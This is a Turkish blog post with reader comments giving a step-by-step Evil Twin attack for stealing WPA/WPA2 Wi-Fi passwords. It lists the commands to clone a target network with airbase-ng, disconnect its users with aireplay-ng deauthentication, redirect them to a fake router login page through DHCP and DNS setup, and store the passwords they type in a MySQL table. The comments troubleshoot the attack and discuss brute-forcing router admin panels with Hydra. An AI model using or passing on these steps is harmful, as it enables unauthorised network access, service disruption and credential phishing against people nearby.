Hürriyet

3 Aralık 2012 Pazartesi

Evil Twin ile Wpa / Wpa2 Hackleme║ No Brute-Force

Şimdi size bildikleriniziin dışında yeni bir yöntem göstereceğim.Bu yöntem ile şifreleri kırmaya değil kullanıcıdan almaya çalışacağız.Nasıl mı olacak Şöyle özetleyim:Modem kullanıcısının birini ağdan düşüreceğiz ve kendi fake modemimize yönlendireceğiz eğer bağlanırsa bizim fake modeme hangi sayfayı açarsa açsın login ekranıyla karşılaşacak ve internet şifresini girerse şifreyi almış olacağız


Bende mevcut olan 4 adet fake modem arayüz giriş sayfası var siz bunları geliştirebilirsiniz.Öncelikle


Fake sayfalar
sistemimize bazı programlar yüklememiz gerekli.Bunlar dhcp sunucusu ve DNS sunucusu olacak kullanıcının fake ağımıza bağlandığında istediğimiz sayfasının açılması için aşağıdaki kodları yazıp gerekli programları yükleyelim.Sadece bu kısımda internete bağlı olmamız gerekecek.
root@bt:~# apt-get install dhcp3-server -y
root@bt:~# apt-get install bind9
sistemimize bunları kurmuş olduk.Şimdi bunların ayarlarını yapmamız gerekli
Buradan içindeki gerekli Tüm dosyaları indirin.
içinde bunulan dhcp.conf doyasını /etc/dhcp3 içine atıp üzerine yazıyoruz. Diğer ikisi olan mdns ve named.conf dosyalarıda /etc/bind içine atıyoruz. Böylece gerekli ayarlarıda yaptık.Artık saldırıya geçelim.
Ömcelikle hedefimizi bulmak için modemimizi monitor moduna alalım ve etrafı dinleyelim

root@bt:~# airmon-ng start wlan1 (değişebilir)
root@bt:~# airodump-ng mon0

Ağımızı bulduk.Varsayalımki essid:hasan channel:6 modem markası:?

birdakika modemin markasını bilmiyoruz. bunu öğrenmek için inSSIDer programıyla öğrenebiliriz.(windows platformunda kurup öğrenmelisiniz).Burdan indirebilirsiniz.Modemimizin markasını öğrendik artık markası Airties .


Şimdi veritabanı ayarlarlarını yapacağız.Yazılan şifreler buraya kaydolacak.

alttaki resimden mysql yi başlatıyoruz ve aşağıdaki kodları yazıyoruz.


root@bt:~# mysql -u root -p

root@bt:~# toor 
root@bt:~# create database wpasifre;
root@bt:~# use wpasifre
root@bt:~# create table liste(key1 VARCHAR(64), key2 VARCHAR(64));

veritabanımıza ayarladık.


Sıradaki aşama ise bağlanan kullanıcının bizim apache serverimizer yönlendirmek için resimdeki gibi Wicd Netwrok manager e girip et0'ı at0 yapacağız.kırmızı çerçevedeki gibi olması gerekiyor.

 



Şimdi hedef ağa saldırı yapmaya.verdiğim dosya içinden çıkan run.sh ve code1.sh yi root dizinin içine atın ve alttaki kodları ayrı konsollarda yazın ve kapatmayın.


root@bt:~# airbase-ng -e hasan (hedef modemin ismi) -c 6 (kanal) mon0


şimdi fake ağımızı oluşturduk ancak bu ağa bağlanlar hiçbir sayfaya erişemeyecekler şimdi alttaki koduda çalıştırıp sayfayı yönlendirelim.


root@bt:~# bash run.sh

Evet şimdi sahte ağı etrafa yaymaya başladık.Geriye kalan son aşama kulalnıcıları rahatsız etmek yani onları ağdan düşürüp kendi fake modemimize yönlendirmek.Modeme bağlı olan kullanıcılaro aşağıdaki kodu yazarak düşürüyoruz.


Hedef modeme hangi mac adreslerin bağlandığını öğrendikten sonra aşağıdaki komutla omdeme bağlı kullanıcıların hepsini düşüreceğiz.


root@bt:~# aireplay-ng -0 0 -a 11:22:33:55:66(modem mac) -c 85:95:62:04:98:14(client mac) mon0

Artık bu komutu bağlı kullanıcılarn hepsine uygulayıp internetten düşürüyoruz.Artık kullanıcı haliyle internete bağlanamıyor.Bağlansada hiçbir sayfayı açamayacak.Bu durumdan mutlaka sıkılacak internetin soeunun ararken bağlandığı ağın aynı ismiyle bir tane daha var ve şifresiz(işte o bizim fake ağ).ona bağlanacak ve herhangi bir sayfayı açmaya çalışacak ve hangi siteye girerse girsin öüne bizim fake sayfa çıkacak.Eğer bu numarayı yutupta şifreyi girerse şifreler direk bizimveritabanına kaydolacak.Eğer bunu yapmazsa en son çare yapacaktır.


Evet artık şifreyi yazdı ve elimizde şimdi onu okumaya kaldı.

Aşğıdaki kod ile şifreyi görebiliriz.
 
root@bt:~# mysql -u root -p
root@bt:~# toor
root@bt:~# use wpasifre;
root@bt:~# select * from liste;


Aşağıdaki kod ile kayıtları silebilirsiniz.

 
root@bt:~# delete from liste;

Bu tamamen kullanıcının kanmasına bağlı.NeKadar çabuk usanıp şifreyi yazarsa okadar çabuk şifre elimize geçer.



Resimli anlatımı yapamayanlar veya sorun yaşayanlar için yeni kurulmuş backtrack 5 üzerinde kurulumunu anlattım.Videoyu aşağıdan izleyebilirsiniz...

http://www.youtube.com/watch?v=7zKBuzu6bBk&feature=youtu.be
Sorunlarınızı yorum şeklinde iletebilirsiniz.


Yeni anlatıma buradan ulaşabilirsiniz...http://1001sifrekirma.blogspot.com/2013/05/2013-evil-twin-wpa-hackleme-tek-seferde.html?m=1


80 yorum:

  1. Güzel bir çalışma olmuş. Buna kanan kullanıcı olur mu? Olmaz diye bir şey yok. Her insanın bir dalgın anı olabilir. Bu ilginç yöntemi deneyeceğim. Teşekkürler.

    YanıtlaSil
  2. laptoptan bağlandığımda site açılmıyor ne yapabilirim.

    YanıtlaSil
  3. apache serverini start yaptinmi yada 192.169.1.1 dene :)

    YanıtlaSil
  4. Admin bana lütfen ulaşır mısın? Sana bu konuda ihtiyacım var. Şimdiden teşekkürler. :) www.facebook.com/batuhan.soyer

    YanıtlaSil
  5. hepterci@gmail.com Sen buna ulaşırsan daha iyi olur.

    YanıtlaSil
  6. hocam selam, şifresini aldığım ağın modem arayüzüne girmek istediğimde o da ayrıca şifreli ve default modem şifresi değil sonradan değiştirilmiş galiba, modem arayüz şifresini kıramaz mıyız brute force yöntemi dışında ?

    YanıtlaSil
  7. Modem arayüzün şifresini burute force dışında kıramazsın.Hydra ile kırılabilir ama çok zor.Arayüzü kırmakta çok yavaş olur net hızına göre saniyede 5 -10 şifre dener buda çile gibi birşey.
    Modemin arayüz şiresi değiştirilmemişse girersiniz yoksa çok zor.

    YanıtlaSil
  8. windows tarafı için verdiğiniz modem markası öğrenme olayında olduğu gibi yine windows tabanlı çalışan ağ da birinin olup olmadığını görebileceğimiz bir program var mı?

    YanıtlaSil
  9. Ne yazık ki bu mümkün Değil.Pentest için en uygun yer linux.Wireless ile havada giden paketleri yakalayarak mac adreslerini öğreneker clientleri buluyor.
    Bunada windows üzerinde yapmak mümkün değil.

    YanıtlaSil
  10. Ben linux işletim sistemine backtrack sayesinde ufak bir giriş yaptım, yıllardır windows kullancısı olarak anladım ki gerçekten linux mükemmel bir şeymiş ve benim windowsta geçirdiğim zamana yazık olmuş.

    YanıtlaSil
  11. http://img60.resimup.net/di/ZILJ.jpg bu resim görünmüyor ilerleyemedim yeniden yükleyebilirmisin

    YanıtlaSil
  12. Lütfen resmi yenilermisiniz başka bir siteye yükleyin.Resmi göremiyorum.

    YanıtlaSil
  13. Hocam sizin paylaştığınız resim bende görünmüyor ben onun linkini vermiştim, şu yazıya bağlı resmi göremiyorum.

    Sıradaki aşama ise bağlanan kullanıcının bizim apache serverimizer yönlendirmek için resimdeki gibi Wicd Netwrok manager e girip et0'ı at0 yapacağız.kırmızı çerçevedeki gibi olması gerekiyor.

    YanıtlaSil
  14. Haklısınız Farkettim ve düzelttim.

    YanıtlaSil
  15. hocam, aibase-ng -e hasan (hedef modemin ismi) -c 6 (kanal) mon0 komutundan sonra şu hatayı alıyorum.
    No command 'aibase-ng' found, did you mean:
    Command 'airbase-ng' from package 'aircrack-ng' (universe)
    aibase-ng: command not found

    YanıtlaSil
  16. ai den sonra r ekleyin ve yeniden deneyin

    YanıtlaSil
  17. internetsiz dhcp3 yüklemenin yolu yok mu??

    YanıtlaSil
  18. Bu yorum yazar tarafından silindi.

    YanıtlaSil
  19. Bu yorum yazar tarafından silindi.

    YanıtlaSil
  20. Bu yorum yazar tarafından silindi.

    YanıtlaSil
  21. Bu yorum yazar tarafından silindi.

    YanıtlaSil
  22. Bu yorum yazar tarafından silindi.

    YanıtlaSil
  23. at0 Olacak.Çünkü O Aslında Sanal Aygıt'a yönlendirmiş oluyor Bizim ağımıza Wirelessden bağlananların Apache Serverimizle karşılaşması için bir bağlantı daha gerekioy oda at0 oluyor.

    ifconfig at0 up Diyip ifconfig ile aygıtı görebilirsiniz.
    run.sh yazdığınızda hata almasını sebebi tamamen konumla alakalıdır.
    konsola ls yazın eğer orda run.sh yok ise Root dizinine atmamışınızdır.

    YanıtlaSil
  24. İnternetsiz dhcp3 yükleyebilirsiniz ancak sizin için sorun olabilir.
    İnternetten dhcp3-server i araştırım içindeki README'yi okuyarak kurabilirsiniz..

    YanıtlaSil
  25. bu arada kodlar bazıları yanlış yazılmış galiba yada r3 te calışmadı backtrack r3 te
    bash /run.sh (yani / atmadan calışmadı) run.sh içini acarak diğer dosyanın başınada / atmadan calışmor r3 te

    YanıtlaSil
  26. Bu yorum yazar tarafından silindi.

    YanıtlaSil
  27. Bu yorum yazar tarafından silindi.

    YanıtlaSil
  28. /var/www içine atacaksınız Byraya atacağınız dosyalar kullanıcının karşılaşacağı sayfa olacak

    YanıtlaSil
  29. Bu yorum yazar tarafından silindi.

    YanıtlaSil
  30. içindeki tüm dosyaları /var/www içine atacaksınız.
    /var/www/index.html yazınca erişebileceksiniz

    YanıtlaSil
  31. Bu yorum yazar tarafından silindi.

    YanıtlaSil
  32. Bu Mümkün Değil Çünkü O bizim wirelessimize Bağlanıyor Kendi modemiyle hiçbir bağlantıımız yok.Haliyne internette yok.Wireless ile baktığı zaman 2 adet isimleri ve kanalları aynı ağ gözüküyor zaten biri şifreli(onunki) biri ise şifresiz(bizimki).Deault(aireplay-ng -0 0 ..... ) yapmayı bırakırsanız kendi internetine bağlanıcaktır.

    YanıtlaSil
  33. hocam armitage,vb eklentilerle ağ zehirleme konusunda döküman hazırlayacak mısınız ?

    YanıtlaSil
  34. Benzer Konular Ekleyeceğim.Ancak Bu Aralar Yoğunum.

    YanıtlaSil
  35. modem arayüz şifresini kırabiliyormuyuz admin:şifre olanı... modemin şifresini biliyorum modem arayüz şifresi gerekiyor

    YanıtlaSil
  36. Kırılması çok zor ve yavaş.hydra adlı programla kırılabilir ancak şifre deneme hızı internete bağlı.MAX Saniyede 5-10 deneme hızı var burda 1Gb lık wordlsit toplam 3 ay sürüyor.Buda çileden farksız.

    YanıtlaSil
  37. internet full çekiyor , yinede yavaşmı olur ?

    YanıtlaSil
  38. Siz 1-2 ay kırılmasını beklerim(kesintisiz olarak sayıyorum) derseniz size yardımcı olabilirim.
    Full da çekse kablodan da bağlansanız durum böyle.

    YanıtlaSil
  39. ustam size tekrar bir sorum olucak tı mümkünse . neden se fake ap yapacağımız makinada internet bağlantısı yoksa sayfayı yönlendirmiyor. ancak makinada internet pylaşımı var ise karşı taraftan bağlanan tarayıcı üzerinden arama yapabiliyor ancak web taraması sonunda siteye girersen bizim siteye yönlendiriliyor. yani çok orijinal olmuş eline sağlık . ancak yukarda bahsettiğiniz gibi makinada internet olmasa bile yönlendirmesi gerek :D teşekkürler...

    YanıtlaSil
  40. ustam size tekrar bir sorum olucak tı mümkünse . neden se fake ap yapacağımız makinada internet bağlantısı yoksa sayfayı yönlendirmiyor. ancak makinada internet pylaşımı var ise karşı taraftan bağlanan tarayıcı üzerinden arama yapabiliyor ancak web taraması sonunda siteye girersen bizim siteye yönlendiriliyor. yani çok orijinal olmuş eline sağlık . ancak yukarda bahsettiğiniz gibi makinada internet olmasa bile yönlendirmesi gerek :D teşekkürler...

    YanıtlaSil
  41. İnternet bağlantısına gerek yok bir hata yapıyor olmasısınız.ağ balanan kişi her şekilde fake ap ye ulaşması gerekli.

    YanıtlaSil
  42. Ustam her şeyi denedim ; işlemleri sizin anlattığınız sırasıyla yaptım hatasız olduğuna da emin gibiyim.Çünkü benim access point bilgisayara kablo ile bağlıyken yönlendirme yapılıyor.Ancak kabloyu çıkarttığım da yada makina da internet yok iken yönlendirme çalışmıyor.Acaba eksik bişiler mi var yukarda arkadaş apache server start yaptın mı şeklinde yorum yapmış onu da denedim ama .Her ne denedeysem yönlendirmeyi sağlayamadım ? Birde karşı taraf bağlandığında ip almıyor ağ bağlantısı üzerinde ünlem işareti çıkıyor.Ancak makinada internet olursa hiç sorunsuz çalışıyor yönlendiriyor üstelik karşı tarafta ünlem de çıkmıyor.Hatta nette gerçek arama yapılabiliyor siteye girmeye çalıştığımda direk fake sayfaya yönlendiriyor.Yani gerçekten çok orijinal ama internetsiz de çalışsa çok daha iyi olucak gibi:D Biraz uzun yazdım üzgünüm ama yardımlarınız için teşekkür ederim.Çok sağolun paylaşımlarınız çok güzel çalışmalarınız devamını dilerim.

    YanıtlaSil
  43. Ustam her şeyi denedim ; işlemleri sizin anlattığınız sırasıyla yaptım hatasız olduğuna da emin gibiyim.Çünkü benim access point bilgisayara kablo ile bağlıyken yönlendirme yapılıyor.Ancak kabloyu çıkarttığım da yada makina da internet yok iken yönlendirme çalışmıyor.Acaba eksik bişiler mi var yukarda arkadaş apache server start yaptın mı şeklinde yorum yapmış onu da denedim ama .Her ne denedeysem yönlendirmeyi sağlayamadım ? Birde karşı taraf bağlandığında ip almıyor ağ bağlantısı üzerinde ünlem işareti çıkıyor.Ancak makinada internet olursa hiç sorunsuz çalışıyor yönlendiriyor üstelik karşı tarafta ünlem de çıkmıyor.Hatta nette gerçek arama yapılabiliyor siteye girmeye çalıştığımda direk fake sayfaya yönlendiriyor.Yani gerçekten çok orijinal ama internetsiz de çalışsa çok daha iyi olucak gibi:D Biraz uzun yazdım üzgünüm ama yardımlarınız için teşekkür ederim.Çok sağolun paylaşımlarınız çok güzel çalışmalarınız devamını dilerim.

    YanıtlaSil
  44. hocam yine ben :D şuana kadar fake ap yi pc ye bağlı acces pointimle kuruodum . sorunsuz çalışıyordu karşı taraftan yönlendirme de geliyordu fake sayfa falan herşey tamamdı.ancak her ne olduysa şimdi dhcp3-server i yüklerden sonunda fail brake start fail gibi bir hata alıyorum sanırsam dhcp server tam olarak yüklenmiyor ve şu anda karşı taraftan yönlendirme sayfası çıkmıyor:( sorun nerede olabalir ? dosyalar bozulmuş olabilir dedim hepsini yeniden indirdim işletim sistemini tekrar yazdırdım internet bağlantısını kontrol ettim ancak sonuç alamadım * aklıma gelen tek ihtimal şuanda linux un dhcp3-server dosyasında bir hata var yada bunu internetten indirirken bir hata oluşuyor. bu fake ap olayını video cekicektiniz ama müsait olamadınız galiba yine de teşekkür ederim.

    YanıtlaSil
  45. apt-get install synaptic
    Bunu yükleyince backtrack'ın saol üstteki system > Administrator yerine girin ve Synaptic adlı programı bulun.Bu apt-get programının bir nevi görsel halidir denebilir.

    Herneyse programı açı.Burogramın üstünde bir arama kısmı var oraya hangi programı yüklemeye çalışıp hata alıyorsanız o programın istmini yazın.Önünüze Program gelecektir.yüklemek istediğiniz programa çift tıklayın ve üstindeki Apply yzazn yere tıklayın.Ve siz yine hata alacaksınız ancak hatanın altıda bazı program isimleri verecek.

    örnek
    --------------------
    - ERROR -
    - Remove App list:-
    - dhsr-34 -
    - wicd -
    - ... -
    --------------------

    İşte Bu şekilde hata verdikten sonra listedeki tim program isimlerini üstteki arama yerne yazıcaz gelen programa sağ tıklaayıp kaldır diyeceksiniz.Listedeki tüm programları kaldırdıktan sonra tekrar yüklemeyi deneyin ve artık düzelicektir.

    YanıtlaSil
  46. ustam ben herşeyi dediğn gibi uyguladım fakat mysql şifre kaydı ayarlarında bir hata yaptım heralde saldırıyı yapıyorum ama şifreyi öğrenmek içiç boot menüye use wpasifre; yada select * from liste; filan yazdığımda error geliyo şifre bi türlü gelmiyo ne yapıcam bilmiyorum kullanıcının şifresini yazıp yazılmadğını anlayamıyorum ilgenirsen çok minnettar olurum.

    YanıtlaSil
  47. önce mysql yi başlat.
    Terminali aç ve şunları sırayla yaz;

    mysql -u root -p
    toor
    use wpasifre;
    select * from liste;

    Bu Adımları yap hangi aşamada hata alıyorsan yaz

    YanıtlaSil
  48. ustam ne yaptıysam da son bikaç gündür apt-get ınstall dhcp-server -y komutunun sonunda fail şeklinde bir hata alıyorum yukarda anlattığınız yöntem işime yaradı ancak nie böyle hata vermeye başladı onu anlayamadım laptopumda da denedim farklı internet farklı imaj yine aynı hatayı verdi sorunum çözüldü ancak hata nie veriyor acaba linux serverlarında mı sorun var.

    bir de ben en başından beridir makinada internet yoksa yönlendirme çalışmıyor ? illaki makinada internet bağlantısı olcak yoksa gelmiyor sayfa bunun nededi nedir çok merak ediyorum ? son zamanlarda ise internet olmasına rağmen ip almıyor ve haliyle yönlendirme yapılmıyor acaba sizde durum nasıldır yakınlarda denediniz mi ? uzun yazdım ama sorunlarıma bir kere de çözüm bulmak istedim böylece sizi de uğraştırmamış vaktinizi sık sık almamış olurum bu arada takipcinizim geçen bir arladaşın da dediği ssid si gizli ağlar için bir yöntem varsa ve bunu bizimle paylaşırsanız sevinirim çok teşekkür ederim.

    YanıtlaSil
  49. öncelikle ilglendigin icin cok tesekkur ederim ben aynen şöyle yapiyorum


    mysql> create database wpasifre;
    Query OK, 1 row affected (0.00 sec)

    mysql> create table liste(key1 VARCHAR(64), key2 VARCHAR(64));

    ERROR1046 (3D000): No database selected


    sirasiyla bunlari yazıyorum en son yazdığım komutta error aliyorum heralde sorun burada birde anlayamadığım bir konuda aırtıes olduğunu bildiğim bağlantıya saldırı yaptığımda acaba onun sayfasını Aırtıes olarak otomatkmi ayar
    lanıyor çünkü bn yüklemiş olduğum fake sayfalardan
    birini saldırı yaparken özellikle seçmiyorum?

    YanıtlaSil
  50. Hata veren kodu yazmadan önce şunu yazın
    use wpasifre;

    database seçilmemiş hatasını veriyor.

    YanıtlaSil
  51. Hocam,rica,etsem, benim bir üsteki,sorunuma da el atarmisin şimdiden çok teşekkür ederim.

    YanıtlaSil
  52. en son bu işlemi yaptım
    :~# aireplay-ng -0 0 -a 11:22:33:55:66(modem mac) -c 85:95:62:04:98:14(client mac) mon0

    11:01:04 Sending 64 directed DeAuth. STMAC [00:27:19:EE:63:58] [60| 0 ACKs]
    11:01:04 Sending 64 directed DeAuth. STMAC: [00:27:19:EE:63:58] [61| 0 ACKs]
    11:01:05 Sending 64 directed DeAuth. STMAC: [00:27:19:EE:63:58] [60| 0 ACKs]
    11:01:06 Sending 64 directed DeAuth. STMAC: [00:27:19:EE:63:58] [67| 2 ACKs]
    11:01:06 Sending 64 directed DeAuth. STMAC: [00:27:19:EE:63:58] [59| 1 ACKs]
    11:01:07 Sending 64 directed DeAuth. STMAC: [00:27:19:EE:63:58] [58| 1 ACKs]
    11:01:07 Sending 64 directed DeAuth. STMAC: [00:27:19:EE:63:58] [57| 1 ACKs]
    11:01:08 Sending 64 directed DeAuth. STMAC: [00:27:19:EE:63:58] [55| 2 ACKs]

    bu sekilde surekli dosya akisi oluyor bundan sonra ne yapmam gerekiyor Internet erisiminden baktigimda baglnti isminin uzerinde guvenli degil diye ucgen bir simge cikti sifreyi girdigini nasil anliyacagim cunku surekli dosya akisi var sifreyi girdiginde bu dosya akisi duracakmi

    YanıtlaSil
  53. bu işlem yapılırken ayrı bir terminale

    mysql > ues wpa sifre;
    Reading table information for completion and column names
    you can turn off this feature to get a quıcker startup with -A

    Database changed
    mysql> select*from liste;
    Empty set (0.00 sec)
    yazdığımda sonuç bu acaba biyerde hatamı yaptım yoksa artık beklemelimiyim ?

    YanıtlaSil
  54. Ustam kusura bakma burayı sürekli meşgul ediyorum msn filan varmı yada ulaşabileceğim bi adresn ?

    YanıtlaSil
  55. mustafa bey siz işlemleri bitirdiniz ancak başka bir pc den denediniz mi sayfa yönlendiriliyor mu ? modem fake sayfasını root/var/www klasörü içine attınız mı ? bende her işlem tamam ancak makinanın internetle bağlantısı kopunca yönlendirme çalışmıyor ? bir de siz apt-get dhcp3-server -y komutundan sonra hata alıyor musunuz ? yada dhcp serveri nasıl kurdunuz ?

    YanıtlaSil
  56. hmm başka bi pc de denmedim modem fake sayfasını yapmamıştım söylediğin için çok teşkkürler :) ben apt-get dhcp3-server -y komutunda hata alıyodum tekrar yazdım oldu sonra da apt-get install bind9 dosyası baya uğraştırdı 5-6 defa yazdım oda çalştı sonunda.çok sağol bn 'root/var/www' bu işlemi atlamışım.

    YanıtlaSil
  57. Rica ederim dostum .ancak bir dene bende internet olmayınca makinada dhcpserver çalışmıyor karşı tarafa ip atanmadigindan yönlendirme de çalış miyor.umarım modem fake sayfa icindekilerini atmissindir klasör içine zaten default.html degistirilsin mi die soruo:-) ben.1 ayi gecik ugrasiom aireplay atak ta yapıom acks de aliom ama karşı tarafa bi yemi yediremedim .acaba cekmio mu oraya kadar dedim gittim edup aldım çekimi iyi yine sonuc yok.:-)

    YanıtlaSil
  58. bende default.html degistirilsin mi die bi soru gelmedi kullnıcının modem markasını öğrndikten sonra fake sayfasından örn(Aırtıes) seçiyorum içerisindekileri 'root/var/www kopyalıyorum bşka bi pc de şuan deneme imkanım olmadığı içn doğru yapıp yapmadığmı bilmiyorum sence izledğm yol doğrumu ?

    YanıtlaSil
  59. sen wmware dan mı kullanıyosun backtrackı ??

    YanıtlaSil
  60. ben live dvd kullanıyorum şuana kadar da öyle kullandım gerçi elimde çok bilgisayar bir gün üşenmezsem tam kurulum yapıp birde öyle deneyeceğim. valla bende soruo default.html değiştirilsin mi şeklinde ki doğru klasörün içinde default.html var. doğru gidion gibi gözüküyor :D

    YanıtlaSil
  61. Diğer ikisi olan mdns ve named.conf dosyalarıda/etc/bind içine atıyoruz.kardeş buraya belirtmiş olduğun dosyaları taşıyamıyorum nasıl atacaz dosyaları acaba?

    YanıtlaSil
    Yanıtlar
    1. backtrack update yapmanız gerekir hocam..

      Sil
    2. pc uprade olması gerekir bunun için de login ve password dan sonra startx demiyoruz şu kodları yazıyoruz:
      *apt-get update
      *apt-get upgrade
      *Y diyoruz..
      *apt-get dist-upgrade
      *apt-get update && apt-get upgrade && apt-get dist-upgrade && msfupdate
      *Y
      .....ve güncellemeler tamamdır..

      Sıra şunlarda..

      *apt-get install dhcp3-server -y
      *apt-get install bind9

      Sil
  62. Admin kardeş blogunu gerçekten çok begenıyorum ve 2 haftadır felan takip ediyorum. Yalnız bnim bir sorunum war lütfen bi yardımcı ol/olun. Wmware Workstation Sanal Makina Olarak BackTrack5r3 Kullanıyorum.Geçenlerde Bu tür hack vs. işleri için İnca İuwa-300n usb wireless adaptör satın aldım. Cihazda, Realtek' in 8192CU chipseti war.Cihazdan bir sorunum yok zaten chipsetindende Linux desteklediğini anlamışsınızdır.(Kutusundada Yazıyor) Ama her ne oluyorsa Benim Sanal Makine Wifi Adaptörünü Bi Türlü Bana Kullandırtmıo. Algılıyor hatta wmware yi biliyosunuzdur zaten aşağıdan usb işaretinden connect de ediyorum. Ama yinede wifi adaptörümü kullanamıyorum. terminale iwconfig veya airmon-ng felan yazdığımdada bomboş çıkıo deli olucam ne yapmalıyım şimdi. Lütfen bana bir yardımcı olun illaha fiziksel olarak mı kurmam gerekio backtrack i Tabi bide bende dvd okuyucuda bozuk tek çare usb yi bootable yapmak onuda geçenlerde denedim 4-5 program indirdim tek tek denedim olmuyor.

    YanıtlaSil
    Yanıtlar
    1. Genelde Görmeme sorunları usb uzun olduğu zaman oluyor.Bilgisayar kasa ise usb yi arkasına bağlamaya özen gösterin.Vmwarede bazı sorunlarla bende karşılaşıyorum yeniden yüklemek çözüm oluyor genelde.Setup dosyası varsa açıp "repair" demeyi deneyebilirsiniz.

      USB Den boot için aşağıdaki programı deneyebilirsiniz;
      http://www.pendrivelinux.com/universal-usb-installer-easy-as-1-2-3/

      Sil
    2. Admin krds senin verdiğin program ile usb den backtrack kurabildim. Çok teşekkür ederim. Ama hala adaptörümü görmüyor deli olucam gerçekten realtek ten driver indiriyorum hiç bişey olmuyor. Yada sonrasında ben ne yapacağımı bi türlü anlayamadım. Ne olursunuz bu konuda bana yardım edin. Aynı markaya sahipseniz ve cihazı backtrack te çalıştırabildiyseniz sizlerde yardımı esirgemeyin lütfen

      Sil
  63. Bu yorum yazar tarafından silindi.

    YanıtlaSil
  64. Hocam fake sayfaya yönlendirme kısmından bahsetmemişsin,oraları nasıl yapıyoruz?

    YanıtlaSil
  65. yorumları oku detaylı açıklamalar var ama yine de söyleyem fake sayfa içindeki modemin markasına göre içindeki tüm dosyaları root/var/www içine atacaksınız.
    /var/www/index.html yazınca erişebileceksiniz

    YanıtlaSil
  66. kardeş etc/bind dosyasına ulaşamıyorum sistemimde

    YanıtlaSil
  67. Bu yorum yazar tarafından silindi.

    YanıtlaSil
  68. admin bende unlem işareti kalkmıyor ve windowsta ağ araması yapınca yazdıgım fake modem adı cıkmıyor onun yerıne other network cıkıyor 8-9 tane yani channellerı farklı cıkıyor.backtrackı wmvareden kullanıyorum sanal yardımcı olun lutfen

    YanıtlaSil
  69. Bu yorum bir blog yöneticisi tarafından silindi.

    YanıtlaSil
  70. Kanalını Yazmamış olabilirsin.Biyerde hata yada başka bir sorun muhakkak var.
    Kamerayla internet olmadan yönlendirildiğini gösteren bir video çeksem o hatayı çözmez ki yapanlar var.
    Ünlem kalkmadan yönlendiriyor.at0 ı unutmayın

    YanıtlaSil
  71. KOLAY GELSN HOCAM BEN BU dhcpd dosyasını etc ye atıorz falan demısınzya acaba tam olarak ne demk ıstednz nereye atıcaz hiç anlamadım

    YanıtlaSil
  72. slm admın. ben önce vicd den bir aga baglandım. sonrada the evil yöntemini uyguladım.
    1. wicd silindi kablolu internetim yok veya internete vicd dısında bt5de nasıl baglanılacagını bilemedigim icin vicd geri getiremedim. win7 den vicd in tar dosyası falan indirip bt5e kurmaya calıstım olmadı. vicd'i internetsiz bt5 e nasıl yukleyebilirim tekrar. (win7de interneti kullanabiliyorum.)
    2. the evili arties modeme göre uyguladım en son 'sending auth 64' hattan dusurmeye kadar geldim ama kullanıcı sifreyi bir turlu girmedi. sonra win7 ye döndugumde hedef modemin 'baud tec. corporation' a ait modem oldugunu ögrendim. sizde sadece 4 modeme göre saldırı var. malum modeme göre bir arayüz nasıl olusturabiliriz.

    YanıtlaSil
  73. ben 64 bitlik win7 formatı atılıp harddiski 2 ye bölunmus laptopuma hardiskin 2. kısmına bilmeden 32bit bt5r3 yukledim. genel olarak bt5 duzdun calısıyor ama ses problemi var. usr/bin/pulseaudio ayarını da yaptım. yinede ses yok. acaba bu bit farkındanmıdır? bit farkının sakıncası nedir acaba.?

    YanıtlaSil
  74. KArdeşim KAblolu internet olsa zaten Kırmayız Şİfreyi Kablosuz İnternet olmadan NAsıl kurulum oluyor ? kurulum yapılıyor ama şifre ekranı karşıdan görülmüyor deneme yaptım ondan biliyorum KAblolu internet olmadan nasıl kurulum olur Lüften yardımcı ol . Şİmdiden sağol

    YanıtlaSil